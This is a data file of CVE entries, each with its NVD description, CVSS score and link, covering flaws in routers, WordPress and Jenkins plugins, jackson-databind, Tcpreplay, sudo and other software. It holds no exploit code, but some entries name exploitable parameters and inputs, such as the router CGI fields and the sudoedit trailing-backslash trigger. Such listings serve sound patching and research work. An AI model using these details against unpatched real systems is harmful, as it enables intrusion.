CVE-2021-41805 HashiCorp Consul Enterprise before 1.8.17, 1.9.x before 1.9.11, and 1.10.x before 1.10.4 has Incorrect Access Control. An ACL token (with the default operator:write permissions) in one namespace can be used for unintended privilege escalation in a different namespace. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-41805
CVE-2021-40857 Auerswald COMpact 5500R devices before 8.2B allow Privilege Escalation via the passwd=1 substring. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-40857
CVE-2021-24848 The mediamaticAjaxRenameCategory AJAX action of the Mediamatic WordPress plugin before 2.8.1, available to any authenticated user, does not sanitise the categoryID parameter before using it in a SQL statement, leading to an SQL injection 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-24848
CVE-2021-42309 Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-42294. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-42309
CVE-2021-46366 An issue in the Login page of Magnolia CMS v6.2.3 and below allows attackers to exploit both an Open Redirect vulnerability and Cross-Site Request Forgery (CSRF) in order to brute force and exfiltrate users' credentials. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-46366
CVE-2022-0289 Use after free in Safe browsing in Google Chrome prior to 97.0.4692.99 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0289
CVE-2022-22854 An access control issue in hprms/admin/?page=user/list of Hospital Patient Record Management System v1.0 allows attackers to escalate privileges via accessing and editing the user list. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-22854
CVE-2022-0824 Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0824
CVE-2022-0204 A heap overflow vulnerability was found in bluez in versions prior to 5.63. An attacker with local network access could pass specially crafted files causing an application to halt or crash, leading to a denial of service. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0204
CVE-2020-25178 ISaGRAF Workbench communicates with Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x using TCP/IP. This communication protocol provides various file system operations, as well as the uploading of applications. Data is transferred over this protocol unencrypted, which could allow a remote unauthenticated attacker to upload, read, and delete files. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2020-25178
CVE-2022-0687 The Amelia WordPress plugin before 1.0.47 stores image blobs into actual files whose extension is controlled by the user, which may lead to PHP backdoors being uploaded onto the site. This vulnerability can be exploited by logged-in users with the custom "Amelia Manager" role. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0687
CVE-2021-3748 A use-after-free vulnerability was found in the virtio-net device of QEMU. It could occur when the descriptor's address belongs to the non direct access region, due to num_buffers being set after the virtqueue elem has been unmapped. A malicious guest could use this flaw to crash QEMU, resulting in a denial of service condition, or potentially execute code on the host with the privileges of the QEMU process. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-3748
CVE-2022-1030 Okta Advanced Server Access Client for Linux and macOS prior to version 1.58.0 was found to be vulnerable to command injection via a specially crafted URL. An attacker, who has knowledge of a valid team name for the victim and also knows a valid target host where the user has access, can execute commands on the local system. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1030
CVE-2022-24768 Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All unpatched versions of Argo CD starting with 1.0.0 are vulnerable to an improper access control bug, allowing a malicious user to potentially escalate their privileges to admin-level. Versions starting with 0.8.0 and 0.5.0 contain limited versions of this issue. To perform exploits, an authorized Argo CD user must have push access to an Application's source git or Helm repository or `sync` and `override` access to an Application. Once a user has that access, different exploitation levels are possible depending on their other RBAC privileges. A patch for this vulnerability has been released in Argo CD versions 2.3.2, 2.2.8, and 2.1.14. Some mitigation measures are available but do not serve as a substitute for upgrading. To avoid privilege escalation, limit who has push access to Application source repositories or `sync` + `override` access to Applications; and limit which repositories are available in projects where users have `update` access to Applications. To avoid unauthorized resource inspection/tampering, limit who has `delete`, `get`, or `action` access to Applications. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-24768
CVE-2022-22688 Improper neutralization of special elements used in a command ('Command Injection') vulnerability in File service functionality in Synology DiskStation Manager (DSM) before 6.2.4-25556-2 allows remote authenticated users to execute arbitrary commands via unspecified vectors. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-22688
CVE-2022-1064 SQL injection through marking blog comments on bulk as spam in GitHub repository forkcms/forkcms prior to 5.11.1. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1064
CVE-2021-35254 SolarWinds received a report of a vulnerability related to an input that was not sanitized in WebHelpDesk. SolarWinds has removed this input field to prevent the misuse of this input in the future. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-35254
CVE-2022-0983 An SQL injection risk was identified in Badges code relating to configuring criteria. Access to the relevant capability was limited to teachers and managers by default. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0983
CVE-2022-1049 A flaw was found in the Pacemaker configuration tool (pcs). The pcs daemon was allowing expired accounts, and accounts with expired passwords to login when using PAM authentication. Therefore, unprivileged expired accounts that have been denied access could still login. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1049
CVE-2021-40904 The web management console of CheckMK Raw Edition (versions 1.5.0 to 1.6.0) allows a misconfiguration of the web-app Dokuwiki (installed by default), which allows embedded php code. As a result, remote code execution is achieved. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session by a user with the role of administrator. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-40904
CVE-2021-40905 The web management console of CheckMK Enterprise Edition (versions 1.5.0 to 2.0.0p9) does not properly sanitise the uploading of ".mkp" files, which are Extension Packages, making remote code execution possible. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session of a user with administrator role. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-40905
CVE-2022-27945 NETGEAR R8500 1.0.2.158 devices allow remote authenticated users to execute arbitrary commands (such as telnetd) via shell metacharacters in the sysNewPasswd and sysConfirmPasswd parameters to password.cgi. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27945
CVE-2022-27946 NETGEAR R8500 1.0.2.158 devices allow remote authenticated users to execute arbitrary commands (such as telnetd) via shell metacharacters in the sysNewPasswd and sysConfirmPasswd parameters to admin_account.cgi. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27946
CVE-2022-27947 NETGEAR R8500 1.0.2.158 devices allow remote authenticated users to execute arbitrary commands (such as telnetd) via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length parameter. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27947
CVE-2021-44103 Vertical Privilege Escalation in KONGA 0.14.9 allows attackers to higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-44103
CVE-2021-24962 The WordPress File Upload Free and Pro WordPress plugins before 4.16.3 allow users with a role as low as Contributor to perform path traversal via a shortcode argument, which can then be used to upload a PHP code disguised as an image inside the auto-loaded directory of the plugin, resulting in arbitrary code execution. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-24962
CVE-2022-0499 The Sermon Browser WordPress plugin through 0.45.22 does not have CSRF checks in place when uploading Sermon files, and does not validate them in any way, allowing attackers to make a logged in admin upload arbitrary files such as PHP ones. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0499
CVE-2022-0770 The Translate WordPress with GTranslate WordPress plugin before 2.9.9 does not have CSRF check in some files, and write debug data such as user's cookies in a publicly accessible file if a specific parameter is used when requesting them. Combining those two issues, an attacker could gain access to a logged in admin cookies by making them open a malicious link or page 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0770
CVE-2022-0427 Missing sanitization of HTML attributes in Jupyter notebooks in all versions of GitLab CE/EE since version 14.5 allows an attacker to perform arbitrary HTTP POST requests on a user's behalf leading to potential account takeover 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0427
CVE-2022-0751 Inaccurate display of Snippet files containing special characters in all versions of GitLab CE/EE allows an attacker to create Snippets with misleading content which could trick unsuspecting users into executing arbitrary commands 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0751
CVE-2022-28136 A cross-site request forgery (CSRF) vulnerability in Jenkins JiraTestResultReporter Plugin 165.v817928553942 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-28136
CVE-2022-28150 A cross-site request forgery (CSRF) vulnerability in Jenkins Job and Node ownership Plugin 0.13.0 and earlier allows attackers to change the owners and item-specific permissions of a job. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-28150
CVE-2022-27432 A Cross-Site Request Forgery (CSRF) in Pluck CMS v4.7.15 allows attackers to change the password of any given user by exploiting this feature leading to account takeover. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27432
CVE-2021-46008 In totolink a3100r V5.9c.4577, the hard-coded telnet password can be discovered from official released firmware. An attacker, who has connected to the Wi-Fi, can easily telnet into the target with root shell if the telnet is function turned on. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-46008
CVE-2021-46010 Totolink A3100R V5.9c.4577 suffers from Use of Insufficiently Random Values via the web configuration. The SESSION_ID is predictable. An attacker can hijack a valid session and conduct further malicious operations. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2021-46010
CVE-2022-25008 totolink EX300_v2 V4.0.3c.140_B20210429 and EX1200T V4.1.2cu.5230_B20210706 does not contain an authentication mechanism. 8.8 https://nvd.nist.gov/vuln/detail/CVE-2022-25008
CVE-2020-27153 In BlueZ before 5.55, a double free was found in the gatttool disconnect_cb() routine from shared/att.c. A remote attacker could potentially cause a denial of service or code execution, during service discovery, due to a redundant disconnect MGMT event. 8.6 https://nvd.nist.gov/vuln/detail/CVE-2020-27153
CVE-2021-3121 An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue. 8.6 https://nvd.nist.gov/vuln/detail/CVE-2021-3121
CVE-2020-25097 An issue was discovered in Squid through 4.13 and 5.x through 5.0.4. Due to improper input validation, it allows a trusted client to perform HTTP Request Smuggling and access services otherwise forbidden by the security controls. This occurs for certain uri_whitespace configuration settings. 8.6 https://nvd.nist.gov/vuln/detail/CVE-2020-25097
CVE-2021-35651 Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Essbase Administration Services. While the vulnerability is in Essbase Administration Services, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Essbase Administration Services accessible data as well as unauthorized update, insert or delete access to some of Essbase Administration Services accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N). 8.5 https://nvd.nist.gov/vuln/detail/CVE-2021-35651
CVE-2022-24475 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912. 8.3 https://nvd.nist.gov/vuln/detail/CVE-2022-24475
CVE-2022-26891 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912. 8.3 https://nvd.nist.gov/vuln/detail/CVE-2022-26891
CVE-2022-26894 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912. 8.3 https://nvd.nist.gov/vuln/detail/CVE-2022-26894
CVE-2022-26895 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912. 8.3 https://nvd.nist.gov/vuln/detail/CVE-2022-26895
CVE-2022-26900 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26908, CVE-2022-26909, CVE-2022-26912. 8.3 https://nvd.nist.gov/vuln/detail/CVE-2022-26900
CVE-2022-26908 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26909, CVE-2022-26912. 8.3 https://nvd.nist.gov/vuln/detail/CVE-2022-26908
CVE-2022-26909 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26912. 8.3 https://nvd.nist.gov/vuln/detail/CVE-2022-26909
CVE-2022-26912 Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24475, CVE-2022-26891, CVE-2022-26894, CVE-2022-26895, CVE-2022-26900, CVE-2022-26908, CVE-2022-26909. 8.3 https://nvd.nist.gov/vuln/detail/CVE-2022-26912
CVE-2020-11987 Apache Batik 1.13 is vulnerable to server-side request forgery, caused by improper input validation by the NodePickerPanel. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. 8.2 https://nvd.nist.gov/vuln/detail/CVE-2020-11987
CVE-2021-44905 Incorrect permissions in the Bluetooth Services in the Fortessa FTBTLD Smart Lock as of 12-13-2022 allows a remote attacker to disable the lock via an unauthenticated edit to the lock name. 8.2 https://nvd.nist.gov/vuln/detail/CVE-2021-44905
CVE-2021-44683 The DuckDuckGo browser 7.64.4 on iOS allows Address Bar Spoofing due to mishandling of the JavaScript window.open function (used to open a secondary browser window). This could be exploited by tricking users into supplying sensitive information such as credentials, because the address bar would display a legitimate URL, but content would be hosted on the attacker's web site. 8.2 https://nvd.nist.gov/vuln/detail/CVE-2021-44683
CVE-2022-1071 User after free in mrb_vm_exec in GitHub repository mruby/mruby prior to 3.2. 8.2 https://nvd.nist.gov/vuln/detail/CVE-2022-1071
CVE-2019-6974 In the Linux kernel before 4.20.8, kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandles reference counting because of a race condition, leading to a use-after-free. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2019-6974
CVE-2019-3710 Dell EMC Networking OS10 versions prior to 10.4.3 contain a cryptographic key vulnerability due to an underlying application using undocumented, pre-installed X.509v3 key/certificate pairs. An unauthenticated remote attacker with the knowledge of the default keys may potentially be able to intercept communications or operate the system with elevated privileges. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2019-3710
CVE-2019-11455 A buffer over-read in Util_urlDecode in util.c in Tildeslash Monit before 5.25.3 allows a remote authenticated attacker to retrieve the contents of adjacent memory via manipulation of GET or POST parameters. The attacker can also cause a denial of service (application outage). 8.1 https://nvd.nist.gov/vuln/detail/CVE-2019-11455
CVE-2019-13115 In libssh2 before 1.9.0, kex_method_diffie_hellman_group_exchange_sha256_key_exchange in kex.c has an integer overflow that could lead to an out-of-bounds read in the way packets are read from the server. A remote attacker who compromises a SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server. This is related to an _libssh2_check_length mistake, and is different from the various issues fixed in 1.8.1, such as CVE-2019-3855. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2019-13115
CVE-2018-1311 The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2018-1311
CVE-2020-12693 Slurm 19.05.x before 19.05.7 and 20.02.x before 20.02.3, in the rare case where Message Aggregation is enabled, allows Authentication Bypass via an Alternate Path or Channel. A race condition allows a user to launch a process as an arbitrary user. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-12693
CVE-2020-28052 An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-28052
CVE-2020-36184 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36184
CVE-2020-36185 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36185
CVE-2020-36186 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36186
CVE-2020-36187 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36187
CVE-2020-36188 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36188
CVE-2020-36189 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36189
CVE-2020-36179 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36179
CVE-2020-36180 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36180
CVE-2020-36182 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36182
CVE-2020-36183 FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36183
CVE-2020-27009 A vulnerability has been identified in Nucleus NET (All versions < V5.2), Nucleus Source Code (Versions including affected DNS modules). The DNS domain name record decompression functionality does not properly validate the pointer offset values. The parsing of malformed responses could result in a write past the end of an allocated structure. An attacker with a privileged position in the network could leverage this vulnerability to execute code in the context of the current process or cause a denial-of-service condition. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-27009
CVE-2022-0829 Improper Authorization in GitHub repository webmin/webmin prior to 1.990. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0829
CVE-2022-24774 CycloneDX BOM Repository Server is a bill of materials (BOM) repository server for distributing CycloneDX BOMs. CycloneDX BOM Repository Server before version 2.0.1 has an improper input validation vulnerability leading to path traversal. A malicious user may potentially exploit this vulnerability to create arbitrary directories or a denial of service by deleting arbitrary directories. The vulnerability is resolved in version 2.0.1. The vulnerability is not exploitable with the default configuration with the post and delete methods disabled. This can be configured by modifying the `appsettings.json` file, or alternatively, setting the environment variables `ALLOWEDMETHODS__POST` and `ALLOWEDMETHODS__DELETE` to `false`. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2022-24774
CVE-2021-4156 An out-of-bounds read flaw was found in libsndfile's FLAC codec functionality. An attacker who is able to submit a specially crafted file (via tricking a user to open or otherwise) to an application linked with libsndfile and using the FLAC codec, could trigger an out-of-bounds read that would most likely cause a crash but could potentially leak memory information that could be used in further exploitation of other flaws. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2021-4156
CVE-2020-21554 A File Deletion vulnerability exists in TinyShop 3.1.1 in the back_list parameter in controllers\\admin.php, which could let a malicious user delete any file such as install.lock to reinstall cms. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2020-21554
CVE-2021-26601 ImpressCMS before 1.4.3 allows libraries/image-editor/image-edit.php image_temp Directory Traversal. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2021-26601
CVE-2022-0136 A vulnerability was discovered in GitLab versions 10.5 to 14.5.4, 14.6 to 14.6.4, and 14.7 to 14.7.1. GitLab was vulnerable to a blind SSRF attack through the Project Import feature. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0136
CVE-2022-28140 Jenkins Flaky Test Handler Plugin 1.2.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2022-28140
CVE-2022-28154 Jenkins Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2022-28154
CVE-2022-28155 Jenkins Pipeline: Phoenix AutoTest Plugin 1.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2022-28155
CVE-2021-43664 totolink EX300_v2 V4.0.3c.140_B20210429 was discovered to contain a command injection vulnerability via the component process&nbsp;forceugpo. 8.1 https://nvd.nist.gov/vuln/detail/CVE-2021-43664
CVE-2021-24905 The Advanced Contact form 7 DB WordPress plugin before 1.8.7 does not have authorisation nor CSRF checks in the acf7_db_edit_scr_file_delete AJAX action, and does not validate the file to be deleted, allowing any authenticated user to delete arbitrary files on the web server. For example, removing the wp-config.php allows attackers to trigger WordPress setup again, gain administrator privileges and execute arbitrary code or display arbitrary content to the users. 8 https://nvd.nist.gov/vuln/detail/CVE-2021-24905
CVE-2017-6429 Buffer overflow in the tcpcapinfo utility in Tcpreplay before 4.2.0 Beta 1 allows remote attackers to have unspecified impact via a pcap file with an over-size packet. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2017-6429
CVE-2017-14266 tcprewrite in Tcpreplay 3.4.4 has a Heap-Based Buffer Overflow vulnerability triggered by a crafted PCAP file, a related issue to CVE-2016-6160. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2017-14266
CVE-2018-20552 Tcpreplay before 4.3.1 has a heap-based buffer over-read in packet2tree in tree.c. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2018-20552
CVE-2018-20553 Tcpreplay before 4.3.1 has a heap-based buffer over-read in get_l2len in common/get.c. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2018-20553
CVE-2019-8376 An issue was discovered in Tcpreplay 4.3.1. A NULL pointer dereference occurred in the function get_layer4_v6() located at get.c. This can be triggered by sending a crafted pcap file to the tcpreplay-edit binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-8376
CVE-2019-8377 An issue was discovered in Tcpreplay 4.3.1. A NULL pointer dereference occurred in the function get_ipv6_l4proto() located at get.c. This can be triggered by sending a crafted pcap file to the tcpreplay-edit binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-8377
CVE-2019-8381 An issue was discovered in Tcpreplay 4.3.1. An invalid memory access occurs in do_checksum in checksum.c. It can be triggered by sending a crafted pcap file to the tcpreplay-edit binary. It allows an attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-8381
CVE-2019-9162 In the Linux kernel before 4.20.12, net/ipv4/netfilter/nf_nat_snmp_basic_main.c in the SNMP NAT module has insufficient ASN.1 length checks (aka an array index error), making out-of-bounds read and write operations possible, leading to an OOPS or local privilege escalation. This affects snmp_version and snmp_helper. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9162
CVE-2019-9896 In PuTTY versions before 0.71 on Windows, local attackers could hijack the application by putting a malicious help file in the same directory as the executable. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9896
CVE-2019-9924 rbash in Bash before 4.4-beta2 did not prevent the shell user from modifying BASH_CMDS, thus allowing the user to execute any command with the permissions of the shell. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-9924
CVE-2019-8956 In the Linux Kernel before versions 4.20.8 and 4.19.21 a use-after-free error in the "sctp_sendmsg()" function (net/sctp/socket.c) when handling SCTP_SENDALL flag can be exploited to corrupt memory. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-8956
CVE-2019-16905 OpenSSH 7.7 through 7.9 and 8.x before 8.1, when compiled with an experimental key type, has a pre-authentication integer overflow if a client or server is configured to use a crafted XMSS key. This leads to memory corruption and local code execution because of an error in the XMSS key parsing algorithm. NOTE: the XMSS implementation is considered experimental in all released OpenSSH versions, and there is no supported way to enable it when building portable OpenSSH. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-16905
CVE-2019-11112 Memory corruption in Kernel Mode Driver in Intel(R) Graphics Driver before 26.20.100.6813 (DCH) or 26.20.100.6812 may allow an authenticated user to potentially enable escalation of privilege via local access. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-11112
CVE-2019-19604 Arbitrary command execution is possible in Git before 2.20.2, 2.21.x before 2.21.1, 2.22.x before 2.22.2, 2.23.x before 2.23.1, and 2.24.x before 2.24.1 because a "git submodule update" operation can run commands found in the .gitmodules file of a malicious repository. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-19604
CVE-2020-9830 A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9830
CVE-2019-20419 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to execute arbitrary code via a DLL hijacking vulnerability in Tomcat. The affected versions are before version 8.5.5, and from version 8.6.0 before 8.7.2. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2019-20419
CVE-2020-1147 A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-1147
CVE-2020-9674 Adobe Bridge versions 10.0.3 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9674
CVE-2020-9675 Adobe Bridge versions 10.0.3 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to arbitrary code execution. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9675
CVE-2020-9676 Adobe Bridge versions 10.0.3 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9676
CVE-2020-15850 Insecure permissions in Nakivo Backup & Replication Director version 9.4.0.r43656 on Linux allow local users to access the Nakivo Director web interface and gain root privileges. This occurs because the database containing the users of the web application and the password-recovery secret value is readable. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-15850
CVE-2020-9958 An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.0 and iPadOS 14.0. An application may be able to cause unexpected system termination or write kernel memory. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9958
CVE-2020-28948 Archive_Tar through 1.4.10 allows an unserialization attack because phar: is blocked but PHAR: is not blocked. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-28948
CVE-2020-14409 SDL (Simple DirectMedia Layer) through 2.0.12 has an Integer Overflow (and resultant SDL_memcpy heap corruption) in SDL_BlitCopy in video/SDL_blit_copy.c via a crafted .BMP file. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-14409
CVE-2021-3156 Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-3156
CVE-2021-29449 Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Multiple privilege escalation vulnerabilities were discovered in version 5.2.4 of Pi-hole core. See the referenced GitHub security advisory for details. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-29449
